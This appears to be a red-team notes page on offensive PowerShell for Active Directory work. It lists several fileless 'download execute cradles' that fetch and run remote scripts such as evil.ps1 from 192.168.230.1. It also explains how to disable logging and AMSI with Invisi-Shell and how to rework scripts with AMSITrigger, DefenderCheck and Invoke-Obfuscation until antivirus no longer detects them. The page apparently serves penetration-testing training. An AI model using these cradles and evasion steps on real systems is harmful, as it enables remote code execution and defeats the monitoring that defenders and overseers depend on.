PowerShell

Loading a Module

• Load a PowerShell script using dot sourcing
. C:\AD\Tools\PowerView.ps1

• A module (or a script) can be imported with:
Import-Module C:\AD\Tools\ADModulemaster\ActiveDirectory\ActiveDirectory.psd1

• All the commands in a module can be listed with:
Get-Command -Module <modulename>

Script Execution

• Download execute cradle
iex (New-Object Net.WebClient).DownloadString('https://webserver/payload.ps1')

$ie=New-Object -ComObject
InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://192.168.230.1/evil.ps1
');sleep 5;$response=$ie.Document.body.innerHTML;$ie.quit();iex $response

PSv3 onwards - iex (iwr 'http://192.168.230.1/evil.ps1')

$h=New-Object -ComObject
Msxml2.XMLHTTP;$h.open('GET','http://192.168.230.1/evil.ps1',$false);$h.send();iex
$h.responseText

$wr = [System.NET.WebRequest]::Create("http://192.168.230.1/evil.ps1")
$r = $wr.GetResponse()
IEX ([System.IO.StreamReader]($r.GetResponseStream())).ReadToEnd()

Invisi-Shell

To bypass:

  • System-wide transcription

  • AMSI

  • System Block Logging

  • CLM

Using Invisi-Shell

• With admin privileges:
RunWithPathAsAdmin.bat

• With non-admin privileges:
RunWithRegistryNonAdmin.bat

• Type exit from the new PowerShell session to complete the clean-up.

Bypassing AV Signatures for Powershell

Use tools like AMSITrigger, DefenderCheck to find out what part of the script defender is detection.

To obfuscate entire script, use Invoke-Obfuscation.

AMSI Trigger

Steps to avoid signature based detection are pretty simple:

  1. Scan using AMSITrigger

  2. Modify the detected code snippet

  3. Rescan using AMSITrigger

  4. Repeat the steps 2 & 3 till we get a result as “AMSI_RESULT_NOT_DETECTED” or “Blank”

Simply provide path to the script file to scan it:

AmsiTrigger_x64.exe -i C:\AD\Tools\Invoke-PowerShellTcp_Detected.ps1
DefenderCheck.exe PowerUp.ps1
PreviousToolsNextAI Security

Last updated